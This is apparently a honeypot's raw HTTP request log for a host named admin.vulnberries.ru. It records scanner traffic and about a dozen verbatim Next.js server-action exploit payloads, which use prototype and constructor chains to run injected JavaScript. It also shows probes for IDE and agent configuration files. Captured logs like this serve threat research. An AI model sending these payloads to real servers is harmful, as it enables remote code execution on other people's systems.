{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 59960+true+1896149;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx113693094041
X-Nextjs-Html-Request-Id: ilovepoop_113693094041
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx113693094041
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 517
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:46812
Path: /
URL: /
Method: POST
[2026-03-05 04:24:04] === HTTP Request ===
[2026-03-05 04:24:04] Main page accessed - IP: 195.3.221.86:46784
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:46784
Path: /
URL: /
Method: GET
[2026-03-05 04:24:04] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate, gzip, deflate
Connection: keep-alive
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.96:52874
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-05 03:56:14] === HTTP Request ===
===================
Via: 1.1 Caddy
Accept-Encoding: identity
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 204.76.203.25
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:38092
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-05 03:55:02] === HTTP Request ===
===================
------WebKitFormBoundaryx1973065913851--
------WebKitFormBoundaryx1973065913851
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1973065913851
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 231162+true+8535425;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1973065913851
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1973065913851
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_1973065913851
Next-Action: x
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:41598
Path: /api/route
URL: /api/route
Method: POST
[2026-03-05 03:27:03] === HTTP Request ===
===================
------WebKitFormBoundaryx1141329896992--
------WebKitFormBoundaryx1141329896992
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1141329896992
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 319729+true+3569679;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1141329896992
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1141329896992
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1141329896992
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:41596
Path: /app
URL: /app
Method: POST
[2026-03-05 03:27:02] === HTTP Request ===
===================
------WebKitFormBoundaryx913307996641--
------WebKitFormBoundaryx913307996641
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx913307996641
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 302055+true+3023648;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx913307996641
Connection: close
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_913307996641
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx913307996641
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:41592
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-05 03:27:02] === HTTP Request ===
===================
------WebKitFormBoundaryx713829921169--
------WebKitFormBoundaryx713829921169
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx713829921169
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 265476+true+2688868;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx713829921169
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36
Connection: close
X-Nextjs-Request-Id: poop1234
X-Nextjs-Html-Request-Id: ilovepoop_713829921169
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx713829921169
Accept-Encoding: gzip, deflate
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:41542
Path: /api
URL: /api
Method: POST
[2026-03-05 03:27:02] === HTTP Request ===
===================
------WebKitFormBoundaryx160785416493--
------WebKitFormBoundaryx160785416493
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx160785416493
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 300254+true+535498;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx160785416493
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
X-Nextjs-Html-Request-Id: ilovepoop_160785416493
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx160785416493
Connection: close
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:41540
Path: /_next
URL: /_next
Method: POST
[2026-03-05 03:27:01] === HTTP Request ===
[2026-03-05 03:27:01] Main page accessed - IP: 193.32.162.28:41496
===================
------WebKitFormBoundaryx23837999299--
------WebKitFormBoundaryx23837999299
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx23837999299
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 12882+true+1850489;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx23837999299
X-Nextjs-Html-Request-Id: ilovepoop_23837999299
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx23837999299
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 513
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:41496
Path: /
URL: /
Method: POST
[2026-03-05 03:27:01] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50010
Path: /.cline/memory.json
URL: /.cline/memory.json
Method: GET
[2026-03-05 02:42:46] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.134:33386
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-04 23:02:05] === HTTP Request ===
[2026-03-04 23:02:05] Main page accessed - IP: 85.142.100.134:33372
===================
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.134:33372
Path: /
URL: /
Method: GET
[2026-03-04 23:02:05] === HTTP Request ===
[2026-03-04 21:17:19] Main page accessed - IP: 172.30.0.12:34314
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Via: 1.1 Caddy
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 23.27.145.100
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34314
Path: /
URL: /
Method: GET
[2026-03-04 21:17:19] === HTTP Request ===
===================
------WebKitFormBoundaryx570090297063--
------WebKitFormBoundaryx570090297063
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx570090297063
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 174779+true+3261778;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx570090297063
Connection: close
Content-Length: 518
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx570090297063
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
X-Nextjs-Html-Request-Id: ilovepoop_570090297063
Next-Action: x
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:41590
Path: /api/route
URL: /api/route
Method: POST
[2026-03-04 21:06:37] === HTTP Request ===
===================
------WebKitFormBoundaryx706308498109--
------WebKitFormBoundaryx706308498109
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx706308498109
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 306972+true+2300889;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx706308498109
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_706308498109
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx706308498109
Next-Action: x
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:59714
Path: /app
URL: /app
Method: POST
[2026-03-04 21:06:37] === HTTP Request ===
===================
------WebKitFormBoundaryx2224197616876--
------WebKitFormBoundaryx2224197616876
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx2224197616876
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 317175+true+7012525;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx2224197616876
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_2224197616876
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx2224197616876
Next-Action: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:59704
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-04 21:06:35] === HTTP Request ===
===================
------WebKitFormBoundaryx1710188429671--
------WebKitFormBoundaryx1710188429671
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1710188429671
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 283770+true+6026671;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1710188429671
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 522
X-Nextjs-Request-Id: poop1234
X-Nextjs-Html-Request-Id: ilovepoop_1710188429671
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1710188429671
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:59692
Path: /api
URL: /api
Method: POST
[2026-03-04 21:06:33] === HTTP Request ===
===================
------WebKitFormBoundaryx103949142617--
------WebKitFormBoundaryx103949142617
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx103949142617
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 28958+true+3589652;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx103949142617
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Connection: close
Content-Length: 517
X-Nextjs-Html-Request-Id: ilovepoop_103949142617
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx103949142617
Next-Action: x
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:59678
Path: /_next
URL: /_next
Method: POST
[2026-03-04 21:06:32] === HTTP Request ===
[2026-03-04 21:06:31] Main page accessed - IP: 195.3.221.86:59676
===================
------WebKitFormBoundaryx461844773809--
------WebKitFormBoundaryx461844773809
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx461844773809
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 113146+true+4081848;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx461844773809
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_461844773809
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx461844773809
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:59676
Path: /
URL: /
Method: POST
[2026-03-04 21:06:31] === HTTP Request ===
[2026-03-04 21:06:31] Main page accessed - IP: 195.3.221.86:59668
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:59668
Path: /
URL: /
Method: GET
[2026-03-04 21:06:31] === HTTP Request ===
[2026-03-04 20:48:31] Main page accessed - IP: 172.30.0.12:47140
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 204.76.203.25
Via: 1.1 Caddy
Accept-Encoding: identity
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:47140
Path: /
URL: /
Method: GET
[2026-03-04 20:48:31] === HTTP Request ===
===================
Sec-Fetch-Dest: script
Sec-Gpc: 1
Cache-Control: no-cache
Dnt: 1
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Te: trailers
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Accept-Language: en-US,en;q=0.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 62.210.198.190:54512
Path: /favicon.ico/sellers.json
URL: /favicon.ico/sellers.json
Method: GET
[2026-03-04 20:36:50] === HTTP Request ===
===================
Te: trailers
Dnt: 1
Connection: keep-alive
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Sec-Gpc: 1
Cache-Control: no-cache
Accept-Language: en-US,en;q=0.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 62.210.198.190:54498
Path: /favicon.ico/app-ads.txt
URL: /favicon.ico/app-ads.txt
Method: GET
[2026-03-04 20:36:50] === HTTP Request ===
===================
Sec-Fetch-Dest: script
Sec-Gpc: 1
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
Te: trailers
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Dnt: 1
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 62.210.198.190:54496
Path: /favicon.ico/ads.txt
URL: /favicon.ico/ads.txt
Method: GET
[2026-03-04 20:36:50] === HTTP Request ===
===================
Te: trailers
Sec-Fetch-Site: cross-site
Sec-Fetch-Dest: script
Sec-Gpc: 1
Cache-Control: no-cache
Dnt: 1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Sec-Fetch-Mode: no-cors
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 62.210.198.190:54482
Path: /login/favicon.ico
URL: /login/favicon.ico
Method: GET
[2026-03-04 20:36:50] === HTTP Request ===
===================
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/login
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 62.210.198.190:48927
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-04 20:36:46] === HTTP Request ===
[2026-03-04 20:36:45] Login page accessed - IP: 62.210.198.190:48927
===================
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Upgrade-Insecure-Requests: 1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 62.210.198.190:48927
Path: /login
URL: /login
Method: GET
[2026-03-04 20:36:45] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 62.210.198.190:48465
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-04 20:36:45] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Accept-Language: en-US,en;q=0.9
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 62.210.198.190:45943
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-04 20:36:45] === HTTP Request ===
===================
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 62.210.198.190:48927
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-04 20:36:45] === HTTP Request ===
[2026-03-04 20:36:45] Main page accessed - IP: 62.210.198.190:48927
===================
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Upgrade-Insecure-Requests: 1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 62.210.198.190:48927
Path: /
URL: /
Method: GET
[2026-03-04 20:36:45] === HTTP Request ===
[2026-03-04 20:36:44] Main page accessed - IP: 62.210.198.190:42012
===================
Accept: */*
User-Agent: curl/7.81.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 62.210.198.190:42012
Path: /
URL: /
Method: HEAD
[2026-03-04 20:36:44] === HTTP Request ===
[2026-03-04 20:33:18] Main page accessed - IP: 158.220.118.242:64613
===================
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 158.220.118.242:64613
Path: /
URL: /
Method: GET
[2026-03-04 20:33:18] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50015
Path: /.vscode/launch.json
URL: /.vscode/launch.json
Method: GET
[2026-03-04 20:13:19] === HTTP Request ===
[2026-03-04 19:58:54] Main page accessed - IP: 147.185.132.45:53056
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 147.185.132.45:53056
Path: /
URL: /
Method: GET
[2026-03-04 19:58:54] === HTTP Request ===
[2026-03-04 19:30:34] Main page accessed - IP: 198.235.24.92:58546
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 198.235.24.92:58546
Path: /
URL: /
Method: GET
[2026-03-04 19:30:34] === HTTP Request ===
[2026-03-04 19:07:11] Main page accessed - IP: 176.65.149.45:34086
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:34086
Path: /
URL: /
Method: GET
[2026-03-04 19:07:11] === HTTP Request ===
[2026-03-04 19:06:31] Main page accessed - IP: 20.64.105.242:60700
===================
User-Agent: Mozilla/5.0 zgrab/0.x
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 20.64.105.242:60700
Path: /
URL: /
Method: GET
[2026-03-04 19:06:31] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:45338
Path: /jars
URL: /jars
Method: GET
[2026-03-04 18:41:05] === HTTP Request ===
===================
Via: 1.1 Caddy
Referer: http://admin.vulnberries.ru/_next
Accept: */*
User-Agent: Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 176.65.148.161
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46246
Path: /_next
URL: /_next
Method: HEAD
[2026-03-04 18:38:37] === HTTP Request ===
[2026-03-04 18:38:36] Main page accessed - IP: 172.30.0.12:46246
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 176.65.148.161
Referer: http://admin.vulnberries.ru
Range: bytes=0-2048
User-Agent: Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)
X-Forwarded-Proto: https
Via: 1.1 Caddy
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46246
Path: /
URL: /
Method: GET
[2026-03-04 18:38:36] === HTTP Request ===
[2026-03-04 18:38:34] Main page accessed - IP: 172.30.0.12:46246
===================
Via: 1.1 Caddy
Referer: http://admin.vulnberries.ru
Accept: */*
User-Agent: Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 176.65.148.161
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46246
Path: /
URL: /
Method: HEAD
